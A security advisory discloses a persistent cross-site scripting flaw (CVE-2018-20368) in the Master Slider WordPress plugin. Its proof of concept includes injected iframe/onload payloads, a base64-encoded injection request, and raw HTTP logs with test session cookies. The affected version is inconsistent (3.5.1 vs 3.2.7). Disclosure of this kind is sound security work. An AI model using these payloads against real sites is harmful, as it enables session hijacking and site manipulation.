Document Title:
===============
WP Master Slider v3.5.1 - Cross Site Scripting Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2158
Reference: https://wordpress.org/support/?post_type=topic&p=10874555
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-20368
CVE-ID:
=======
CVE-2018-20368
Release Date:
=============
2018-11-14
Vulnerability Laboratory ID (VL-ID):
====================================
2158
Common Vulnerability Scoring System:
====================================
4.3
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Master Slider WordPress slider plugin is a premium image and content slider with super smooth hardware accelerated transitions.
It supports touch navigation with pure swipe gesture, that you have never experienced before. Master Slider is a truly responsive
and device friendly slider which works perfectly on all major devices. Master Slider plugin is an well done layer slider as well,
with the ability to add any HTML contents (texts, images, …) in layers. It is easy to use, plus there are 80+ ready to use sample
sliders for you. You have almost everything such as hotspots, thumbnails, video support, a variety of effects, and many more
features in this plugin. Master Slider WordPress slider is the most complete among the best sliders.
(Copy of the Homepage: https://wordpress.org/plugins/master-slider )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site scripting vulnerability in the official Master Slider v3.5.1 wordpress plugin.
Vulnerability Disclosure Timeline:
==================================
2018-11-14: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Averta Ltd
Product: Master Slider - Wordpress Plugin 3.2.7
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Guest Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Full Disclosure
Technical Details & Description:
================================
A persistent cross site web vulnerability has been discovered in the official Master Slider v3.5.1 wordpress plugin.
The vulnerability allows to inject unauthorized malicious script codes on the application-side of the affected module.
The persistent cross site scripting web vulnerability is located in the `name` input field of the `MSPanel.Settings`
value on `callback`. The injection point of the vulnerability is the input field. The execution point occurs in the
master-slider listing page after the insert or edit. The attack vector is located on the application-side and the
request method to inject is POST.
Exploitation of the issue requires a privileged web-application user account and only low user interaction.
Successful exploitation of the application-side vulnerability results in session hijacking, persistent phishing,
persistent external redirects and persistent manipulation affected or connected module context.
Proof of Concept (PoC):
=======================
The xss vulnerability can be exploited by authenticated remote attackers with low user interaction.
For security demonstration or to reproduce the issue follow the provided information or steps below.
PoC: Master Slider (Item Listing)
<tfoot>
<tr>
<th scope="col" class="manage-column column-ID sortable desc" style=""><a href="https://wp.localhost:8080/wp-admin/admin.php?page=master-slider&orderby=ID&order=asc"><span>ID</span><span class="sorting-indicator"></span></a></th><th scope="col" class="manage-column column-title"
style="">Name</th><th scope="col" class="manage-column column-shortcode" style="">Shortcode</th><th scope="col" class="manage-column column-slides_num"
style="">Slides</th><th scope="col" class="manage-column column-type" style="">Typ</th><th scope="col" class="manage-column column-date_modified sortable desc"
style=""><a href="https://wp.localhost:8080/wp-admin/admin.php?page=master-slider&orderby=date_modified&order=asc"><span>Zuletzt modifiziert</span><span
class="sorting-indicator"></span></a></th><th scope="col" class="manage-column column-date_created sortable desc" style="">
<a href="https://wp.localhost:8080/wp-admin/admin.php?page=master-slider&orderby=date_created&order=asc">
<span>Erstellungsdatum</span><span class="sorting-indicator"></span></a></th><th scope="col" class="manage-column column-action" style="">Aktion</th>
</tr>
</tfoot>
<tbody id="the-list" data-wp-lists="list:slider">
<tr class="alternate"><td class="ID column-ID">5</td><td class="title column-title">
<a href="/wp-admin/admin.php?page=master-slider&action=edit&slider_id=5">Suche, Sitemap, 404</a></td>
<td class="shortcode column-shortcode">[masterslider id="5"]</td><td class="slides_num column-slides_num">4</td>
<td class="type column-type"></td><td class="date_modified column-date_modified"><abbr title="2018/10/12 @ 11:41:39 AM">
6 Tagen zurück</abbr></td><td class="date_created column-date_created"><abbr title="2018/10/12 @ 11:28:05 AM">2018/10/12</abbr></td>
<td class="action column-action"><a class="action-duplicate msp-ac-btn msp-btn-gray msp-iconic"
href="/wp-admin/admin.php?page=master-slider&action=duplicate&slider_id=5&paged"><span></span>duplicate</a>
<a class="action-delete msp-ac-btn msp-btn-red msp-iconic" href="/wp-admin/admin.php?page=master-slider&action=delete&slider_id=5&paged"
onclick="return confirm('Bist Du sicher, dass du diesen Slider löschen möchtest?');"><span></span>delete</a><a class="action-preview msp-ac-btn
msp-btn-blue msp-iconic" href="/wp-admin/admin.php?page=master-slider&action=preview&slider_id=5"
onclick="lunchMastersliderPreviewBySliderID(5);return false;"><span></span>preview</a></td></tr><tr><td class="ID column-ID">8</td>
<td class="title column-title"><a href="/wp-admin/admin.php?page=master-slider&action=edit&slider_id=8">Wasserwerke</a></td>
<td class="shortcode column-shortcode">[masterslider id="8"]</td><td class="slides_num column-slides_num">2</td><td class="type column-type"></td>
<td class="date_modified column-date_modified"><abbr title="2018/10/12 @ 11:43:09 AM">6 Tagen zurück</abbr></td>
<td class="date_created column-date_created"><abbr title="2018/10/12 @ 11:28:05 AM">2018/10/12</abbr></td><td class="action column-action">
<a class="action-duplicate msp-ac-btn msp-btn-gray msp-iconic" href="/wp-admin/admin.php?page=master-slider&action=duplicate&slider_id=8&paged">
<span></span>duplicate</a><a class="action-delete msp-ac-btn msp-btn-red msp-iconic"
href="/wp-admin/admin.php?page=master-slider&action=delete&slider_id=8&paged" onclick="return confirm('Bist Du sicher, dass du diesen Slider
löschen möchtest?');"><span></span>delete</a><a class="action-preview msp-ac-btn msp-btn-blue msp-iconic"
href="/wp-admin/admin.php?page=master-slider&action=preview&slider_id=8" onclick="lunchMastersliderPreviewBySliderID(8);return false;"><span></span>
preview</a></td></tr><tr class="alternate"><td class="ID column-ID">11</td><td class="title column-title">
<a href="/wp-admin/admin.php?page=master-slider&action=edit&slider_id=11">Startseite</a></td><td class="shortcode column-shortcode">[masterslider id="11"]</td>
<td class="slides_num column-slides_num">4</td><td class="type column-type"></td><td class="date_modified column-date_modified"><abbr title="2018/10/12 @ 11:36:21 AM">
6 Tagen zurück</abbr></td><td class="date_created column-date_created"><abbr title="2018/10/12 @ 11:28:06 AM">2018/10/12</abbr></td><td class="action column-action">
<a class="action-duplicate msp-ac-btn msp-btn-gray msp-iconic" href="/wp-admin/admin.php?page=master-slider&action=duplicate&slider_id=11&paged">
<span></span>duplicate</a><a class="action-delete msp-ac-btn msp-btn-red msp-iconic" href="/wp-admin/admin.php?page=master-slider&action=delete&slider_id=11&paged"
onclick="return confirm('Bist Du sicher, dass du diesen Slider löschen möchtest?');"><span></span>delete</a><a class="action-preview msp-ac-btn msp-btn-blue msp-iconic"
href="/wp-admin/admin.php?page=master-slider&action=preview&slider_id=11" onclick="lunchMastersliderPreviewBySliderID(11);return false;"><span></span>
preview</a></td></tr><tr><td class="ID column-ID">15</td><td class="title column-title"><a href="/wp-admin/admin.php?page=master-slider&action=edit&slider_id=15">
test><"<img>%20%20>"<iframe src="evil.source" onload="alert("PENTEST")">>"<iframe src=evil.source onload=alert("PENTEST")>[EXECUTION POINT!]</a></td>
<td class='shortcode column-shortcode'>[masterslider id="15"]</td><td class='slides_num column-slides_num'>1</td><td class='type column-type'></td>
<td class='date_modified column-date_modified'><abbr title="2018/10/18 @ 10:37:08 AM">2 Stunden zurück</abbr></td><td class='date_created column-date_created'>
<abbr title="2018/10/18 @ 10:33:08 AM">2018/10/18</abbr></td><td class='action column-action'><a class="action-duplicate msp-ac-btn msp-btn-gray msp-iconic"
href="/wp-admin/admin.php?page=master-slider&action=duplicate&slider_id=15&paged"><span></span>duplicate</a>
<a class="action-delete msp-ac-btn msp-btn-red msp-iconic" href="/wp-admin/admin.php?page=master-slider&action=delete&slider_id=15&paged"
onClick="return confirm('Bist Du sicher, dass du diesen Slider löschen möchtest?');" ><span></span>delete</a><a class="action-preview msp-ac-btn msp-btn-blue msp-iconic"
href="/wp-admin/admin.php?page=master-slider&action=preview&slider_id=15" onClick="lunchMastersliderPreviewBySliderID(15);return false;" >
<span></span>preview</a></td></tr> </tbody>
</table>
--- PoC Session Logs ---
Injection Point:
https://wp.localhost:8080/wp-admin/admin-ajax.php
Host: wp.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://wp.localhost:8080/wp-admin/admin.php?page=master-slider&action=edit&slider_id=15
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 2804
Cookie: wordpress_sec_1547bd92e799236af84e94f=evolution-security%7C1540022551%7CLIA3SdTGrpO1RMuSM4pAZdgVovv68eONarU2dUeKCOS%7C9cdd7f1ec32368ff2447af7085184244
4a8cca3e6223df2bf6e10f8251202831; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_1547bd92e799134fe929c236af84e94f=evolution-security%7C1540022551%7CLIA3SdTGrpO1RMuSM4eONarU2dUeKCOS%7C31a9303a9369483a20f7115b853bbef72e0d6f2735839426e56ac48b53d3b62c; wp-settings-time-21=1539851588;
wp-settings-21=libraryContent%3Dbrowse
Connection: keep-alive
action=msp_panel_handler&nonce=a03c4c229b&msp_data=eyJtZXRhIjp7IlNldHRpbmdzIWlkcyI6IjEiLCJTZXR0aW5ncyFuZXh0SWQiOjIsIlNsaWRlIWlkcyI6IjEiLCJTbGlkZSFuZXh0SWQiO
jIsIkNvbnRyb2whaWRzIjoiMSIsIkNvbnRyb2whbmV4dElkIjoyLCJDYWxsYmFjayFpZHMiOiIxIiwiQ2FsbGJhY2shbmV4dElkIjoyfSwiTVNQYW5lbC5TZXR0aW5ncyI6eyIxIjoie1wiaWRcIjpcIjFcIix
cInNuYXBwaW5nXCI6dHJ1ZSxcImRpc2FibGVDb250cm9sc1wiOmZhbHNlLFwibmFtZVwiOlwiYWFhPjxcXFwiPGltZz4lMjAlMjA+XFxcIjxpZnJhbWUgc3JjPWV2aWwuc291cmNlIG9ubG9hZD1hbGVydCgiUEVOVEVTVCIpPj5cXFwiPGlmcmFtZSBzcmM9ZXZpbC5zb3VyY2Ugb25sb2FkPWFsZXJ0KCJQRU5URVNUIik+XCIsXCJ3aWR0aFwiOlwiMTAwMFwiLFwiaGVpZ2h0XCI6XCI1MDBcIixcIndyYXBwZXJXaWR0aFVuaXRcIjpcInB4XCIsXCJhdXRvQ3JvcFwiOmZhbHNlLFwidHlwZVwiOlwiY3VzdG9tXCIsXCJzbGlkZXJ
JZFwiOlwiMTVcIixcImVuYWJsZU92ZXJsYXlMYXllcnNcIjp0cnVlLFwibGF5b3V0XCI6XCJib3hlZFwiLFwiYXV0b0hlaWdodFwiOmZhbHNlLFwidHJWaWV3XCI6XCJiYXNpY1wiLFwic3BlZWRcIjpcIjI
wXCIsXCJzcGFjZVwiOlwiMFwiLFwic3RhcnRcIjpcIjFcIixcImdyYWJDdXJzb3JcIjpcIjFcIixcInN3aXBlXCI6XCIxXCIsXCJtb3VzZVwiOlwiMVwiLFwid2hlZWxcIjpcIlwiLFwiYXV0b3BsYXlcIjp
cIlwiLFwibG9vcFwiOlwiXCIsXCJzaHVmZmxlXCI6XCJcIixcInByZWxvYWRcIjpcIi0xXCIsXCJvdmVyUGF1c2VcIjpcIjFcIixcImVuZFBhdXNlXCI6XCJcIixcImhpZGVMYXllcnNcIjpcIlwiLFwiZGly
XCI6XCJoXCIsXCJwYXJhbGxheE1vZGVcIjpcInN3aXBlXCIsXCJ1c2VEZWVwTGlua1wiOmZhbHNlLFwiZGVlcExpbmtUeXBlXCI6XCJwYXRoXCIsXCJzY3JvbGxQYXJhbGxheE1vdmVcIjozMCxcInNjcm9sb
FBhcmFsbGF4QkdNb3ZlXCI6NTAsXCJzY3JvbGxQYXJhbGxheEZhZGVcIjp0cnVlLFwiY2VudGVyQ29udHJvbHNcIjpcIjFcIixcImluc3RhbnRTaG93TGF5ZXJzXCI6XCJcIixcImNsYXNzTmFtZVwiOlwiPl
xcXCI8aWZyYW1lIHNyYz1ldmlsLnNvdXJjZSBvbmxvYWQ9YWxlcnQoIlBFTlRFU1QiKT5cIixcImN1c3RvbVN0eWxlXCI6XCI+XFxcIjxpZnJhbWU+ICUyMCA+XFxcIjxpZnJhbWUgc3JjPWE+XCIsXCJza2luXCI6XCJtcy1za2luLWRlZmF1bHRcIixcIm1zVGVtcGxhdGVcIjpcImN1c3RvbVwiLFwibXNUZW1wbGF0ZUNsYXNzXCI6XCJcIixcInVzZWRGb250c1wiOlwiXCJ9In0sIk1TUGFuZWwuU2xpZ
GUiOnsiMSI6IntcImlkXCI6XCIxXCIsXCJ0aW1lbGluZV9oXCI6MjAwLFwiYmdUaHVtYlwiOlwiLzIwMTgvMTAvMS0xNTB4MTUwLnBuZ1wiLFwiaXNPdmVybGF5TGF5ZXJzXCI6ZmFsc2UsXCJvcmRlclwiOjA
sXCJiZ1wiOlwiLzIwMTgvMTAvMS5wbmdcIixcImR1cmF0aW9uXCI6XCIzXCIsXCJmaWxsTW9kZVwiOlwiZmlsbFwiLFwiYmd2X2ZpbGxtb2RlXCI6XCJmaWxsXCIsXCJiZ3ZfbG9vcFwiOlwiMVwiLFwiYmd2X
211dGVcIjpcIjFcIixcImJndl9hdXRvcGF1c2VcIjpcIlwiLFwiYmdBbHRcIjpcIj5cXFwiPGlmcmFtZT4gJTIwID5cXFwiPGlmcmFtZSBzcmM9YT5cIixcImJnVGl0bGVcIjpcIj5cXFwiPGlmcmFtZT4gJTI
wID5cXFwiPGlmcmFtZSBzcmM9YT5cIixcImxheWVyX2lkc1wiOltdfSJ9LCJNU1BhbmVsLkNvbnRyb2wiOnsiMSI6IntcImlkXCI6XCIxXCIsXCJsYWJlbFwiOlwiUGZlaWxlXCIsXCJuYW1lXCI6XCJhcnJvd
3NcIixcImF1dG9IaWRlXCI6dHJ1ZSxcIm92ZXJWaWRlb1wiOnRydWUsXCJpbnNldFwiOnRydWV9In0sIk1TUGFuZWwuQ2FsbGJhY2siOnsiMSI6IntcImlkXCI6XCIxXCIsXCJsYWJlbFwiOlwiQmVpIEluaXRp
YWxpc2VydW5nIGRlcyBTbGlkZXJzXCIsXCJuYW1lXCI6XCJJTklUXCIsXCJjb250ZW50XCI6XCI+XFxcIjxpZnJhbWUgc3JjPWV2aWwuc291cmNlIG9ubG9hZD1hbGVydCgiUEVOVEVTVCIpPlwifSJ9fQ
&preset_style=eyJtZXRhIjp7fX0=&preset_effect=eyJtZXRhIjp7fX0=&buttons=eyJtZXRhIjp7fX0=&slider_id=15
POST: HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 08:46:54 GMT
Server: Apache
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Content-Length: 55
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json
Excution Point:
https://wp.localhost:8080/wp-admin/admin.php?page=master-slider
Host: wp.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://wp.localhost:8080/wp-admin/admin.php?page=master-slider
Cookie: wordpress_sec_1547bd92e799f=evolution-security%7C1540022551%7CLIA3SdTGrpO1RMuSM4pAZdgVovv68eONarU2dUeKCOS%7C9cdd7f1ec32368ff2447af70851842444a8cca3e6223df2bf6e10f8251202831; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_1547bd92e799134fe929c236af84e94f=evolution-security%7C1540022551%7CLIA3SdTGrpO1RMuSM4pAZdgVovv68eONarU2dUeKCOS%7C31a9303a9369483a20f7115b853bbef72e0d6f2735839426e56ac48b53d3b62c; wp-settings-time-21=1539851588; wp-settings-21=libraryContent%3Dbrowse
Connection: keep-alive
Upgrade-Insecure-Requests: 1
GET: HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 08:41:21 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20665
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
https://wp.localhost:8080/wp-admin/load-styles.php?c=1&dir=ltr&load[]=dashicons,admin-bar,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-pointer,widgets&load[]=,site-icon,l10n,buttons,wp-auth-check,wp-color-picker&ver=4.9.8
Host: wp.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/css,*/*;q=0.1
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://wp.localhost:8080/wp-admin/admin.php?page=master-slider
Cookie: wordpress_sec_1547bd92e799f=evolution-security%7C1540022551%7CLIA3SdTGrpO1RMuSM4pAZdgVovv68eONarU2dUeKCOS%7C9cdd7f1ec32368ff2447af70851842444a8cca3e6223df2bf6e10f8251202831; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_1547bd92e799134fe929c236af84e94f=evolution-security%7C1540022551%7CLIA3SdTGrpO1RMuSM4pAZdgVovv68eONarU2dUeKCOS%7C31a9303a9369483a20f7115b853bbef72e0d6f2735839426e56ac48b53d3b62c; wp-settings-time-21=1539851588; wp-settings-21=libraryContent%3Dbrowse
Connection: keep-alive
GET: HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 08:40:21 GMT
Server: Apache
Etag: 4.9.8
Expires: Fri, 18 Oct 2019 08:40:21 GMT
Cache-Control: public, max-age=31536000
Vary: Accept-Encoding
Content-Encoding: deflate
Content-Type: text/css; charset=UTF-8
Reference(s):
https://wp.localhost:8080/wp-admin/admin.php
https://wp.localhost:8080/wp-admin/admin-ajax.php
https://wp.localhost:8080/wp-admin/admin.php?page=master-slider
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure validate of the title input value.
In a second step the output listing needs to be parsed as well to prevent the execution point.
Security Risk:
==============
The security risk of the cross site scripting web vulnerability in the wordpress plugin is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [research@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™